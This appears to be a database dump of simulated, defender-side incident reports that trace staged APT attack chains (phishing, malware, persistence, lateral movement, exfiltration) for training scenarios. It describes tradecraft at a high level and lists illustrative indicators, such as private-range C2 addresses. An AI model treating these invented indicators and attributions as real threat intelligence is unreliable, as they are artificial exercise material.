(1, 1, 268, 1, 'Investigative Report: Phishing Email Analysis', '### Overview\nThe initial alert in Operation Dark Current has detected a phishing email targeting employees at the power facility. The email contained a malicious attachment disguised as a routine internal document.\n\n### Findings\n- **Sender:** The email originated from a compromised external account known for past association with the Sandworm APT group.\n- **Attachment:** An Excel file with embedded macros designed to execute upon opening.\n- **Targets:** Key personnel within the corporate IT network.\n\n### Next Steps\nThis incident indicates the potential for malware deployment. Increased scrutiny on email attachments and network traffic is advised as the next phase of the attack may involve malware execution.', '2025-12-31 13:10:04'),
(2, 1, 269, 2, 'Malware Analysis: BlackEnergy Deployment', '### Overview\nFollowing the phishing incident, BlackEnergy malware has been executed within the corporate IT network. Analysis of this malware is crucial to understanding the attack vector and preventing further incidents.\n\n### Findings\n- **Functionality:** BlackEnergy is a versatile malware capable of launching DDoS attacks, stealing credentials, and deploying additional payloads.\n- **Indicators of Compromise:** Network traffic to known malicious IPs and unusual process creation on infected systems.\n\n### Next Steps\nDetection of persistence mechanisms is critical. Efforts should be focused on identifying registry changes or scheduled tasks that suggest the establishment of persistence within the network.', '2025-12-31 13:10:04'),
(3, 1, 270, 3, 'Persistence Mechanism Identified', '### Overview\nInvestigation reveals that the attackers have established persistence within the corporate IT environment, allowing them to maintain access even after system reboots.\n\n### Findings\n- **Techniques Used:** Modification of startup scripts and registry keys; scheduled tasks pointing to malicious scripts.\n- **Affected Systems:** Several key servers and workstations exhibit signs of compromise.\n\n### Next Steps\nAttention should now shift towards detecting and preventing lateral movement towards the Operational Technology (OT) network, as this is a likely next step for the attackers.', '2025-12-31 13:10:04'),
(4, 1, 271, 4, 'Lateral Movement Detected: OT Network Breach', '### Overview\nThe attackers have successfully moved laterally from the corporate IT network into the OT network, a critical phase in compromising the power grid\'s infrastructure.\n\n### Findings\n- **Methods:** Use of stolen credentials and exploitation of trusted connections between IT and OT networks.\n- **Compromised Components:** Initial access to the OT network has been confirmed on systems managing SCADA operations.\n\n### Next Steps\nImmediate action is required to contain and mitigate any potential SCADA system compromise. Focus should be on isolating affected systems and monitoring for execution attempts within the SCADA environment.', '2025-12-31 13:10:04'),
(5, 1, 272, 5, NULL, NULL, '2025-12-31 13:10:04'),
(6, 2, 274, 1, NULL, NULL, '2025-12-31 13:43:07'),
(7, 2, 275, 2, 'Analysis of Malicious Code Execution on Developer Systems', '# Malicious Code Execution on Developer Systems\n\n## Context\nFollowing the phishing attempts through weaponized job offers, the adversary has successfully executed malicious code on the targeted developer systems. This report analyzes the initial compromise and provides insights into the malware tactics used.\n\n## Key Findings\n- **Delivery Method**: The phishing emails contained attachments disguised as job descriptions, which, once opened, executed a macro to download a secondary payload.\n- **Payload Details**: The malware used is a variant of the Lazarus Group’s known toolkit, designed to evade traditional antivirus solutions and persist within compromised systems.\n- **Immediate Impact**: Initial indicators suggest that the malware is harvesting credentials and establishing communication with command-and-control (C2) servers.\n\n## Recommendations\n- **Immediate Actions**: Isolate affected systems and perform a full forensic analysis to identify all compromised endpoints.\n- **Preventive Measures**: Conduct security awareness training focusing on phishing detection and enforce strict email attachment policies.', '2025-12-31 13:43:07'),
(8, 2, 276, 3, 'Establishing Persistence and Lateral Movement within the Network', '# Establishing Persistence and Lateral Movement\n\n## Context\nPost-malicious code execution, the adversary is moving laterally within the network, aiming to establish persistence across multiple systems. This report delves into the techniques used by the Lazarus Group for lateral movement and persistence.\n\n## Key Findings\n- **Techniques Used**: The attackers are leveraging compromised credentials and exploiting existing vulnerabilities to move laterally within the organization’s network.\n- **Persistence Mechanisms**: The group is using scheduled tasks and registry modifications to maintain access to compromised systems.\n- **Targeted Assets**: Key systems identified include cryptocurrency wallets and financial transaction servers.\n\n## Recommendations\n- **Network Segmentation**: Strengthen network segmentation to limit lateral movement.\n- **Monitoring and Detection**: Implement enhanced monitoring for unusual login activities and unauthorized access attempts.', '2025-12-31 13:43:07'),
(9, 2, 277, 4, 'Cryptocurrency Exfiltration Tactics and Laundering Channels', '# Cryptocurrency Exfiltration and Laundering\n\n## Context\nWith persistence established, the Lazarus Group is actively exfiltrating cryptocurrency assets, utilizing complex laundering channels to obfuscate the funds\' origins. This report provides insights into the exfiltration processes and laundering mechanisms employed.\n\n## Key Findings\n- **Exfiltration Process**: The attackers are using custom scripts to automate the transfer of cryptocurrency from compromised wallets to intermediary accounts.\n- **Laundering Channels**: Funds are being funneled through a series of mixer services and exchanged across multiple cryptocurrency platforms to obscure the trail.\n- **Evasion Tactics**: The group employs rapid transfer sequences and leverages decentralized exchanges to minimize traceability.\n\n## Recommendations\n- **Transaction Monitoring**: Enhance transaction monitoring to identify unusual patterns and large transfers out of normal business hours.\n- **Collaboration with Exchanges**: Work closely with cryptocurrency exchanges and financial institutions to flag and freeze suspicious transactions.', '2025-12-31 13:43:07'),
(10, 3, 278, 1, 'Analysis of Malicious Code Execution', '### Background\nFollowing the detection of a compromised update package, forensic analysis has confirmed the execution of malicious code on affected systems. This report delves into the mechanisms employed by APT41 to activate their payload upon deployment of the infected update.\n\n### Key Findings\n- **Initial Execution**: The malicious DLL is designed to execute upon the initialization of the server management software.\n- **Obfuscation Techniques**: APT41 has employed advanced obfuscation techniques to avoid detection by traditional antivirus software.\n- **Payload Functionality**: The primary functions include system reconnaissance and the establishment of backdoor access for further exploitation.\n\n### Next Steps\nMitigation should focus on the identification and isolation of compromised hosts. Enhanced monitoring for unusual system activity is recommended to detect further malicious behavior.', '2025-12-31 13:45:44'),
(11, 3, 279, 2, 'Persistence Mechanisms and Countermeasures', '### Overview\nAPT41 has been observed establishing persistence on compromised systems following the execution of their payload. This report outlines the persistence techniques used and suggests countermeasures to neutralize this threat.\n\n### Persistence Techniques\n- **Registry Modifications**: Alterations to the Windows Registry to ensure the malware runs on system startup.\n- **Scheduled Tasks**: Creation of scheduled tasks to execute malware at specified intervals.\n\n### Recommended Countermeasures\n- **Registry Auditing**: Regular audits of the registry for unauthorized changes.\n- **Task Scheduler Monitoring**: Implement alerts for the creation of new scheduled tasks.\n\n### Conclusion\nNeutralizing persistence is critical to prevent further exploitation and lateral movement within the network.', '2025-12-31 13:45:44'),
(12, 3, 280, 3, 'Lateral Movement and Data Exfiltration Insights', '### Incident Summary\nPost-establishment of persistence, APT41 has initiated lateral movement to expand its foothold within the network and commenced data exfiltration activities. This report provides insights into these operations and their implications.\n\n### Lateral Movement Tactics\n- **Credential Dumping**: Use of tools to extract login credentials from compromised systems.\n- **Remote Services**: Exploitation of remote desktop and SMB services for network traversal.\n\n### Data Exfiltration\n- **Command and Control (C2) Channels**: Data is being exfiltrated using encrypted C2 channels to evade detection.\n- **Volume and Target Data**: Focus on intellectual property and financial records.\n\n### Recommendations\n- **Network Segmentation**: Implement stringent network segmentation to contain the spread.\n- **Data Loss Prevention (DLP)**: Deploy DLP solutions to monitor and block unauthorized data transfers.\n\n### Conclusion\nProactive measures are essential to detect and thwart further lateral movement and data theft by the adversary.', '2025-12-31 13:45:44'),
(13, 3, 281, 4, NULL, NULL, '2025-12-31 13:45:44'),
(14, 4, 285, 1, 'Analysis of Malicious Domain Infrastructure', '### Overview\nFollowing the detection of a spear-phishing email campaign targeting political organizations, further analysis has led to the identification of a network of malicious domains. These domains are linked to APT28\'s credential harvesting activities.\n\n### Findings\n- **Domain Patterns:** The domains employ similar naming conventions, often mimicking legitimate services to deceive targets.\n- **Hosting and IP Details:** The infrastructure is hosted across several countries, complicating attribution and takedown efforts.\n- **SSL/TLS Certificates:** Many domains utilize Let\'s Encrypt certificates, providing a false sense of security.\n\n### Recommendations\n- **Monitoring and Blocking:** Implement domain monitoring for known malicious patterns and block identified domains at the network level.\n- **User Education:** Enhance awareness training focused on recognizing phishing attempts related to these domains.', '2025-12-31 15:17:10'),
(15, 4, 286, 2, 'Investigation into OAuth Token Abuse', '### Overview\nSubsequent to the discovery of malicious domains, evidence of OAuth token abuse has been detected. This technique is being used to maintain persistent access to compromised accounts within targeted organizations.\n\n### Findings\n- **Scope of Abuse:** Multiple accounts within political organizations have been accessed using OAuth tokens, bypassing traditional authentication.\n- **Attack Vectors:** Tokens are likely being obtained through previously identified spear-phishing campaigns.\n- **Impact:** Abused tokens allow threat actors to conduct operations with legitimate access, making detection difficult.\n\n### Recommendations\n- **Token Revocation:** Immediate revocation of suspicious OAuth tokens is critical.\n- **Enhanced Monitoring:** Deploy advanced monitoring to detect anomalous token usage patterns.\n- **User Awareness:** Educate users on the risks of OAuth token misuse and encourage cautious application authorization.', '2025-12-31 15:17:10'),
(16, 4, 287, 3, 'Disinformation Campaign Planning Insights', '### Overview\nIntelligence has surfaced regarding the planning of a disinformation campaign by APT28, aimed at influencing public perception during the national election period.\n\n### Findings\n- **Tactics and Channels:** The campaign plans to utilize social media platforms and fake news websites to disseminate false narratives.\n- **Target Audience:** Efforts are focused on swaying undecided voters and amplifying societal divisions.\n- **Coordination:** Activities appear to be coordinated with other malicious operations, potentially leveraging stolen credentials and OAuth access.\n\n### Recommendations\n- **Collaboration:** Work with social media companies to identify and remove fake accounts and content.\n- **Public Awareness:** Launch public awareness initiatives to educate voters on identifying disinformation.\n- **Intel Sharing:** Foster information sharing among national and international partners to enhance detection and response efforts.', '2025-12-31 15:17:10'),
(17, 4, 288, 4, NULL, NULL, '2025-12-31 15:17:10'),
(18, 5, 289, 1, 'Analysis of Phishing Email Attack Vector', '### Overview\nThe phishing email was identified as the initial attack vector used by the Wizard Spider APT group. The email, disguised as an urgent communication from a trusted medical supplier, contained a malicious link to a counterfeit login page.\n\n### Technical Details\n- **Sender Email Address**: spoofed@trustedmedical.com\n- **Subject Line**: \'Immediate Action Required: Update Your Credentials\'\n- **Date/Time Detected**: 2023-10-15 09:45 UTC\n- **Malicious URL**: hxxp://update-credentials[.]secure-med[.]com\n\n### Next Steps\nThe detection of this phishing email suggests the potential for further malicious activity. Vigilance is advised for indicators of TrickBot malware, commonly used by Wizard Spider after initial entry.', '2025-12-31 15:22:50'),
(19, 5, 290, 2, 'TrickBot Malware Execution Analysis', '### Overview\nTrickBot malware was executed following the successful phishing attack, marking the transition from initial access to establishing a foothold within the hospital network.\n\n### Technical Details\n- **Malware Type**: TrickBot variant\n- **Execution Path**: C:\\\\Users\\\\Public\\\\updater.exe\n- **Date/Time Detected**: 2023-10-15 10:15 UTC\n- **Command and Control (C2) Server**: 192.168.1.100\n\n### Persistence Mechanisms\nThe malware is known to deploy persistence mechanisms to maintain access. Monitoring for scheduled tasks or registry changes is crucial as we anticipate these activities to follow.', '2025-12-31 15:22:50'),
(20, 5, 291, 3, 'Persistence Mechanism Identification', '### Overview\nPersistence mechanisms were identified, confirming the adversary\'s intent to maintain long-term access to the hospital\'s network.\n\n### Technical Details\n- **Registry Key Modification**: HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\n- **Scheduled Task Created**: \'SystemUpdater\' running updater.exe\n- **Date/Time Detected**: 2023-10-15 11:00 UTC\n\n### Indicator of Lateral Movement\nThe presence of persistence mechanisms suggests the next likely phase is lateral movement. Cobalt Strike, a common tool for such activities, should be anticipated.', '2025-12-31 15:22:50'),
(21, 5, 292, 4, 'Cobalt Strike Beacon Detection', '### Overview\nA Cobalt Strike beacon was detected, indicating the adversary\'s progression to lateral movement within the network.\n\n### Technical Details\n- **Beacon IP Address**: 192.168.1.101\n- **Beacon Port**: 4444\n- **Date/Time Detected**: 2023-10-15 11:45 UTC\n- **Communication Method**: HTTPS\n\n### Implications\nThis activity signifies an imminent threat of ransomware deployment. Immediate action is required to isolate affected systems and prevent the final stage of ransomware encryption.', '2025-12-31 15:22:50'),
(22, 5, 293, 5, NULL, NULL, '2025-12-31 15:22:50'),
(23, 6, 294, 1, 'Report: Analysis of Initial Access via Spear Phishing Campaign', '### Overview\nThe spear phishing campaign executed by the Carbanak/FIN7 group was highly targeted, focusing on banking personnel with access to critical systems. The phishing emails were crafted to appear as legitimate internal communications, increasing the probability of successful compromise.\n\n### Key Indicators\n- **Email Subject:** \'Urgent Security Update Required\'\n- **Sender Domain:** spoofed from `security-update@bankinginternal.com`\n- **Attachment:** Malicious XLS file named `Security_Update.xls`\n\n### Next Steps\nThe next phase involves deploying malware to harvest credentials. It is critical to monitor for anomalies in user behavior and system access patterns to mitigate further compromise.', '2025-12-31 15:23:56'),
(24, 6, 295, 2, 'Report: Malware Execution and Credential Harvesting Analysis', '### Overview\nFollowing the initial spear phishing attack, the Carbanak/FIN7 group deployed a sophisticated malware payload. This malware is designed to execute stealthily and harvest credentials from compromised systems.\n\n### Malware Characteristics\n- **Type:** Remote Access Trojan (RAT)\n- **Capabilities:** Keylogging, screen capture, credential dumping\n- **Persistence Mechanism:** Scheduled Tasks and Registry modifications\n\n### Next Steps\nAttention should be directed towards detecting and isolating instances of lateral movement within the network. Implement robust network segmentation and monitor for unauthorized access attempts to critical systems.', '2025-12-31 15:23:56'),
(25, 6, 296, 3, 'Report: Lateral Movement and Network Exploitation Techniques', '### Overview\nCarbanak/FIN7 have initiated lateral movement across the network, leveraging harvested credentials to escalate privileges and access sensitive systems.\n\n### Techniques Observed\n- **Credential Reuse:** Exploiting weak password policies\n- **Pass-the-Hash:** Utilizing NTLM hashes to authenticate\n- **Exploitation of Vulnerable Services:** Targeting unpatched systems for entry\n\n### Next Steps\nThe final stage involves manipulation of ATM withdrawal limits and exploitation of SWIFT gateways. Enhance monitoring of financial transaction systems and initiate real-time alerts for unusual transaction patterns.', '2025-12-31 15:23:56'),
(26, 6, 297, 4, NULL, NULL, '2025-12-31 15:23:56'),
(27, 7, 304, 1, 'Analysis of Spear Phishing Email Detected', '## Overview\nThe initial spear phishing email was detected targeting key personnel within the IT department of the multinational energy corporation. The email contained a malicious attachment disguised as a financial report.\n\n## Details\n- **Sender**: An email address mimicking a known supplier.\n- **Subject Line**: \'Urgent: Q3 Financial Summary Required\'\n- **Attachment**: A macro-enabled Excel file designed to execute a PowerShell script upon opening.\n\n## Next Steps\nMonitoring for any execution of scripts related to this email is crucial to prevent further compromise. Pay special attention to any PowerShell activities that may be triggered as a result of this email.', '2026-01-02 04:27:59'),
(28, 7, 305, 2, 'Investigation into Suspicious PowerShell Execution', '## Overview\nFollowing the detection of the spear phishing email, a suspicious PowerShell script execution was identified on the workstation of a targeted employee.\n\n## Details\n- **Script Purpose**: The PowerShell script was designed to establish a remote connection with command-and-control (C2) servers operated by APT34.\n- **Indicators**: Execution logs show obfuscation techniques to evade detection.\n\n## Insights\nThis execution suggests the attackers are attempting to gain a foothold within the network. Immediate measures should be taken to isolate the affected system and prevent the establishment of persistence mechanisms.', '2026-01-02 04:27:59'),
(29, 7, 306, 3, 'Identification of Persistence Mechanism Established', '## Overview\nAPT34 has successfully established a persistence mechanism within the compromised systems, leveraging scheduled tasks for recurring execution of malicious scripts.\n\n## Details\n- **Technique**: Creation of scheduled tasks to execute scripts at regular intervals.\n- **Tools Used**: Commonly used Windows utilities to create and modify tasks.\n\n## Strategic Implications\nThe persistence indicates a strategic intention to maintain long-term access. This necessitates a thorough review of scheduled tasks across all systems to pinpoint and neutralize unauthorized entries.', '2026-01-02 04:27:59'),
(30, 7, 307, 4, 'Detection of Unauthorized Lateral Movement', '## Overview\nAnomalous activity indicating unauthorized lateral movement within the corporate network was detected, suggesting the attackers are expanding their access.\n\n## Details\n- **Method**: Use of stolen credentials to access additional systems.\n- **Targets**: Systems containing sensitive geological data.\n\n## Recommendations\nStrengthen monitoring of privileged accounts and implement network segmentation to hinder further lateral movement. It\'s critical to review access logs to understand the attack path and prevent data exfiltration attempts.', '2026-01-02 04:27:59'),
(31, 7, 308, 5, NULL, NULL, '2026-01-02 04:27:59'),
(32, 8, 319, 1, 'Phishing Email Analysis', '### Overview\nThe initial alert identified a **suspicious email** likely associated with a phishing attempt. This is often the first step in APT10\'s strategy to deliver malicious payloads.\n\n### Detailed Analysis\n- **Sender\'s Email:** The email originated from a domain resembling a known vendor, indicating a possible **spear-phishing** attempt.\n- **Content:** The email contained a link to a compromised website designed to harvest credentials.\n- **Attachment:** A malicious document file was attached, likely containing a macro to execute malware upon opening.\n\n### Next Steps\n- **Containment:** Block the sender\'s domain and similar variants.\n- **Awareness:** Educate employees on identifying phishing attempts.\n- **Monitoring:** Increase surveillance on network activities for any unauthorized application executions, which could indicate successful malware deployment.', '2026-01-02 20:23:41'),
(33, 8, 320, 2, 'Malware Execution Insight', '### Overview\nFollowing the phishing incident, an alert was triggered for **unauthorized application execution**. This suggests that the malware embedded in the phishing email has been activated.\n\n### Detailed Analysis\n- **Execution Path:** The malware was executed from a temporary directory, consistent with initial payload delivery tactics.\n- **Detection:** Antivirus logs show the execution of a file named `loader.exe`, indicative of a dropper or loader.\n- **Behavior:** The malware attempts to establish a connection with a known C2 server used by APT10.\n\n### Next Steps\n- **Containment:** Isolate the affected system to prevent further spread.\n- **Forensics:** Capture memory and disk images for analysis.\n- **Monitoring:** Watch for attempts to establish persistence mechanisms, which could solidify the presence of the threat.', '2026-01-02 20:23:41'),
(34, 8, 321, 3, 'Persistence Mechanism Investigation', '### Overview\nThe detection of a **persistence mechanism** indicates that the attackers are attempting to maintain access to the compromised system.\n\n### Detailed Analysis\n- **Registry Changes:** The malware modified registry keys to ensure execution upon startup.\n- **Scheduled Tasks:** A new scheduled task was created to execute the malware at regular intervals.\n- **Service Installation:** A new service, disguised as a legitimate application, was installed to run the malware.\n\n### Next Steps\n- **Containment:** Disable the scheduled tasks and services related to the malware.\n- **Forensics:** Analyze registry changes to understand the full scope.\n- **Monitoring:** Prepare for potential lateral movement attempts, as attackers may try to extend control over the network.', '2026-01-02 20:23:41'),
(35, 8, 322, 4, 'Lateral Movement Analysis', '### Overview\nThe alert for **lateral movement** suggests that APT10 is attempting to expand its foothold within the network.\n\n### Detailed Analysis\n- **Tools Used:** The attackers utilized tools such as `PsExec` and `WMI` to move laterally.\n- **Compromised Accounts:** Credentials from privileged accounts were used, indicating possible credential dumping.\n- **Targets:** Lateral movement attempts were detected towards servers hosting critical data.\n\n### Next Steps\n- **Containment:** Reset passwords for compromised accounts and enhance MFA enforcement.\n- **Forensics:** Conduct a thorough audit of account activities and access logs.\n- **Monitoring:** Be vigilant for data exfiltration attempts, as the attackers might next attempt to extract sensitive information.', '2026-01-02 20:23:41'),
(36, 8, 323, 5, NULL, NULL, '2026-01-02 20:23:41'),
(37, 9, 324, 1, NULL, NULL, '2026-01-02 20:29:44'),
(38, 9, 325, 2, 'Analysis of Malicious Firmware Update', '### Executive Summary\nAfter detecting suspicious network traffic suggesting initial access, a detailed analysis of the firmware update process revealed an unauthorized update to the firewall\'s SPI flash memory.\n\n### Technical Details\n- **Firmware Image**: The firmware image checksum did not match the expected value, indicating tampering.\n- **Analysis Tools**: Utilized Binwalk and Firmware Mod Kit to dissect the firmware.\n- **Findings**: Embedded payload designed for remote command execution.\n\n### Next Steps\nInvestigate persistence mechanisms that may have been established through this malicious firmware.', '2026-01-02 20:29:44'),
(39, 9, 326, 3, 'Investigation of Persistence Mechanism', '### Executive Summary\nA persistence mechanism was detected, ensuring the malicious firmware\'s survival across reboots.\n\n### Technical Details\n- **Method**: The implant modified bootloader scripts to reload the malicious payload.\n- **Detection Tools**: Compared bootloader script with known good configurations.\n\n### Next Steps\nMonitoring for signs of lateral movement within the network.', '2026-01-02 20:29:44'),
(40, 9, 327, 4, 'Signs of Lateral Movement within Network', '### Executive Summary\nThe compromised firewall is being used as a pivot point for lateral movement within the network.\n\n### Technical Details\n- **Indicators of Compromise (IoCs)**: Multiple unusual authentication attempts logged.\n- **Network Zones Affected**: Activity detected in the DMZ and internal subnet.\n\n### Next Steps\nEstablish containment measures to prevent further spread and identify C2 communication channels.', '2026-01-02 20:29:44'),
(41, 9, 328, 5, 'Command and Control Channel Analysis', '### Executive Summary\nA command and control channel has been established, facilitating remote administration of the compromised system.\n\n### Technical Details\n- **C2 Protocol**: Detected use of DNS tunneling for stealthy communication.\n- **Frequency**: Regular beaconing every 5 minutes.\n\n### Next Steps\nImplement measures to block C2 communication and monitor for data exfiltration attempts.', '2026-01-02 20:29:44'),
(42, 9, 329, 6, 'Detection of Data Exfiltration Attempt', '### Executive Summary\nA data exfiltration attempt was intercepted, aimed at extracting sensitive information from the network.\n\n### Technical Details\n- **Method**: Data packaged in compressed archives, sent over HTTPS.\n- **Volume**: Approximately 500MB of data targeted.\n\n### Next Steps\nInvestigate for signs of privilege escalation that may have facilitated the exfiltration.', '2026-01-02 20:29:44'),
(43, 9, 330, 7, 'Privilege Escalation Analysis', '### Executive Summary\nPrivilege escalation attempts have been detected, likely to gain higher-level access for further exploitation.\n\n### Technical Details\n- **Vector**: Exploitation of known vulnerability in outdated software.\n- **Detection**: Log analysis showed unauthorized changes to system files and configurations.\n\n### Next Steps\nExamine logs and configurations for attempts to cover tracks and evade defenses.', '2026-01-02 20:29:44'),
(44, 9, 331, 8, 'Defense Evasion Tactics Observed', '### Executive Summary\nAttempts to cover tracks and evade defense mechanisms were observed following privilege escalation.\n\n### Technical Details\n- **Tactics**: Deletion of log files, disabling of security tools.\n- **Detection Tools**: Anomaly detection in SIEM highlighted these activities.\n\n### Next Steps\nConduct internal reconnaissance to determine the target assets and finalize response strategies.', '2026-01-02 20:29:44'),
(45, 9, 332, 9, 'Internal Reconnaissance Activities', '### Executive Summary\nInternal reconnaissance activities have been detected, indicating preparation for final data extraction.\n\n### Technical Details\n- **Techniques Used**: Network scanning and mapping of critical systems.\n- **Tools Detected**: Use of custom scripts mimicking legitimate admin tools.\n\n### Next Steps\nPrepare for potential final data extraction and reinforce monitoring on critical assets.', '2026-01-02 20:29:44'),
(46, 9, 333, 10, 'Final Data Extraction Attempt Analysis', '### Executive Summary\nA final data extraction attempt was detected, marking the culmination of the attack chain.\n\n### Technical Details\n- **Targeted Data**: High-value intellectual property and customer data.\n- **Method**: Attempted exfiltration via cloud-based storage services.\n\n### Conclusion\nThe attack cycle is complete. Immediate containment and remediation actions should be prioritized to prevent future breaches.', '2026-01-02 20:29:44'),
(47, 10, 334, 1, 'Analysis of Obfuscated JavaScript Payload', '### Overview\nFollowing the detection of the compromised website, analysts have identified a suspicious JavaScript payload designed to execute upon a user\'s visit. This script is heavily obfuscated, suggesting advanced techniques employed by APT32 to avoid detection.\n\n### Observations\n- **Obfuscation Techniques:** The script uses multiple layers of encoding and dynamic code generation.\n- **Execution Trigger:** The payload is triggered when specific conditions are met, such as user agent matching and referrer checks.\n\n### Recommendations\n- **Immediate Action:** Set up sandbox environments to safely deobfuscate and analyze the script.\n- **Further Investigation:** Monitor network traffic for any anomalous patterns indicative of further payload execution.', '2026-01-02 20:31:37'),
(48, 10, 335, 2, 'Custom Backdoor Analysis', '### Overview\nUpon successful execution of the obfuscated JavaScript, a custom backdoor is installed on macOS systems. This backdoor is unique to APT32 and provides persistent access to infected devices.\n\n### Key Features\n- **Persistence Mechanism:** The backdoor uses Launch Daemons for persistence, ensuring it runs at startup.\n- **Capabilities:** Allows remote access, file manipulation, and execution of arbitrary commands.\n\n### Recommendations\n- **Detection:** Implement host-based rules to detect known persistence techniques used by this backdoor.\n- **Mitigation:** Advise users to update macOS and employ endpoint protection solutions.', '2026-01-02 20:31:37'),
(49, 10, 336, 3, 'Command and Control Communication Analysis', '### Overview\nThe custom backdoor begins communicating with a Command and Control (C2) server once installed. This stage marks the lateral movement phase, where the attacker maintains control over the compromised devices.\n\n### Observations\n- **C2 Channels:** Utilizes HTTPS for encrypted communication, making detection challenging.\n- **Behavioral Patterns:** Regular check-ins with the server and potential data upload activity.\n\n### Recommendations\n- **Network Monitoring:** Deploy advanced monitoring to identify atypical HTTPS traffic patterns.\n- **Threat Intelligence:** Leverage threat intelligence feeds to flag known APT32 infrastructure.', '2026-01-02 20:31:37'),
(50, 10, 337, 4, 'Data Exfiltration Attempt Detected', '### Overview\nThe final stage of the attack involves attempts to exfiltrate sensitive data from the compromised organization. This represents a significant threat to the confidentiality of human rights advocacy efforts.\n\n### Observations\n- **Exfiltration Tactics:** Use of compressed archives sent over encrypted channels.\n- **Data Types Targeted:** Email communications, internal documents, and contact databases.\n\n### Recommendations\n- **Data Loss Prevention (DLP):** Implement DLP solutions to monitor and block unauthorized data transfers.\n- **Incident Response:** Engage incident response teams to contain and mitigate the impact of exfiltration attempts.', '2026-01-02 20:31:37'),
(51, 10, 338, 5, NULL, NULL, '2026-01-02 20:31:37'),
(52, 11, 339, 1, 'Web Shell Deployment Detected', '### Overview\nFollowing the initial access via ProxyLogon Zero-Day exploit, our systems have identified the deployment of a web shell, specifically **China Chopper**.\n\n### Details\n- **Web Shell Name**: China Chopper\n- **Behavior**: Provides attackers with remote access and control over the compromised server.\n- **Indicators of Compromise (IoCs)**: Presence of unusual web application files.\n\n### Next Steps\nFocus on identifying the source of the web shell and potential attackers. Prepare for potential credential theft attempts, which are commonly executed following web shell deployment.', '2026-01-03 00:04:00'),
(53, 11, 340, 2, 'Credential Harvesting Detected', '### Overview\nAfter the deployment of China Chopper, there are signs of credential harvesting using **Mimikatz**.\n\n### Details\n- **Tool Used**: Mimikatz\n- **Purpose**: Extracting user credentials from the compromised system.\n- **Indicators**: Unauthorized access attempts, suspicious processes running on the server.\n\n### Next Steps\nMonitor for lateral movement attempts within the network, as attackers may use harvested credentials to propagate.', '2026-01-03 00:04:00'),
(54, 11, 341, 3, 'Lateral Movement Activity Observed', '### Overview\nCredential harvesting has led to lateral movement through SMB protocol, indicating an attempt to propagate within the network.\n\n### Details\n- **Protocol Used**: SMB (Server Message Block)\n- **Objective**: Gain access to additional systems using harvested credentials.\n- **Indicators**: Unusual login attempts across network nodes.\n\n### Next Steps\nPrepare for potential reconnaissance activities by the attackers, as they seek to map the network and identify valuable data.', '2026-01-03 00:04:00'),
(55, 11, 342, 4, 'Reconnaissance Activity Detected', '### Overview\nFollowing lateral movement, attackers are executing reconnaissance commands to gather information about the network.\n\n### Details\n- **Commands Used**: Network mapping tools, system enumeration commands.\n- **Purpose**: Identify critical systems and data of interest.\n- **Indicators**: Unusual network scans and command executions.\n\n### Next Steps\nAnticipate data collection attempts for exfiltration. Implement monitoring to detect unusual data access patterns.', '2026-01-03 00:04:00'),
(56, 11, 343, 5, 'Data Collection Identified', '### Overview\nReconnaissance has led to data collection activities, likely preparing for exfiltration.\n\n### Details\n- **Activity**: Access and aggregation of sensitive data.\n- **Objective**: Prepare data for exfiltration.\n- **Indicators**: Large data access events, unusual file movements.\n\n### Next Steps\nExpect attempts to exfiltrate data via HTTP POST or other channels. Enhance monitoring on outbound traffic.', '2026-01-03 00:04:00'),
(57, 11, 344, 6, 'Data Exfiltration Attempt Detected', '### Overview\nData exfiltration is underway, with attackers using HTTP POST requests to transmit collected data.\n\n### Details\n- **Method**: HTTP POST\n- **Target**: External servers\n- **Indicators**: Unusual outbound traffic patterns, large amounts of data being sent out.\n\n### Next Steps\nPrepare for potential cleanup operations by attackers. Strengthen defenses to prevent further exfiltration and identify any remaining web shells or backdoors.', '2026-01-03 00:04:00'),
(58, 11, 345, 7, 'Defense Evasion Activity Noted', '### Overview\nAttackers are attempting to clean up and remove indicators of their presence to evade detection.\n\n### Details\n- **Activities**: Deleting logs, removing malware traces, altering system settings.\n- **Objective**: Obfuscate attack traces and maintain persistence.\n- **Indicators**: Missing logs, altered system configurations.\n\n### Next Steps\nConduct a thorough forensic analysis to recover deleted logs and identify any remaining indicators. Implement stronger endpoint monitoring to detect future attempts.', '2026-01-03 00:04:00'),
(59, 11, 346, 8, NULL, NULL, '2026-01-03 00:04:00'),
(60, 12, 347, 1, 'Analysis of Initial Access via Spear Phishing', '# Initial Access via Spear Phishing\n\n## Summary\nFollowing the detection of spear phishing attempts, analysis of intercepted emails reveals the use of legitimate-looking diplomatic communications as a lure. The phishing emails were tailored to the targeted individuals using publicly available information.\n\n## Details\n- **Sender**: The emails appear to originate from trusted diplomatic entities.\n- **Payload**: The emails contain malicious attachments that exploit vulnerabilities in document readers.\n- **Target**: Individuals within diplomatic networks.\n\n## Next Steps\nThe successful spear phishing attack sets the stage for the execution of a Remote Access Tool (RAT), which is likely the next step in the adversary\'s playbook.\n\n## Recommendations\n- Increase awareness and training for diplomatic personnel regarding spear phishing tactics.\n- Implement email filtering and sandboxing solutions to detect and block malicious attachments.', '2026-01-03 00:37:55'),
(61, 12, 348, 2, 'Execution of Remote Access Tool (RAT) Analysis', '# Execution of Remote Access Tool\n\n## Summary\nAfter gaining initial access, the adversaries executed a Remote Access Tool (RAT) on compromised systems. This RAT allows them to remotely control the infected machines and facilitates further exploitation.\n\n## Details\n- **RAT Capabilities**: File transfer, command execution, and keylogging.\n- **Persistence**: The RAT is configured to start at system boot, ensuring continuous access.\n- **Communication**: The tool communicates with command and control (C2) servers using encrypted channels to evade detection.\n\n## Next Steps\nDeployment of a rootkit is anticipated to establish deeper persistence and stealth, likely the next phase in the attack.\n\n## Recommendations\n- Monitor network traffic for anomalous connections to known or suspected C2 domains.\n- Conduct thorough endpoint scans to identify and neutralize the RAT.', '2026-01-03 00:37:55'),
(62, 12, 349, 3, 'Rootkit Deployment and Persistence Mechanism', '# Rootkit Deployment for Persistence\n\n## Summary\nThe adversaries have deployed a sophisticated rootkit to ensure persistent access to compromised systems. This rootkit is designed to operate silently and evade detection by traditional security tools.\n\n## Details\n- **Rootkit Features**: Kernel-level access, anti-debugging techniques, and hidden file storage.\n- **Impact**: The rootkit grants long-term control over the system and masks malicious activities.\n- **Detection**: Difficult to detect without specialized tools due to its deep integration.\n\n## Next Steps\nWith rootkit persistence established, the attackers are likely to move laterally within the network, exploiting hijacked credentials to expand their reach.\n\n## Recommendations\n- Deploy advanced endpoint detection and response (EDR) solutions to identify unusual behavior.\n- Perform regular integrity checks of system files and settings.', '2026-01-03 00:37:55'),
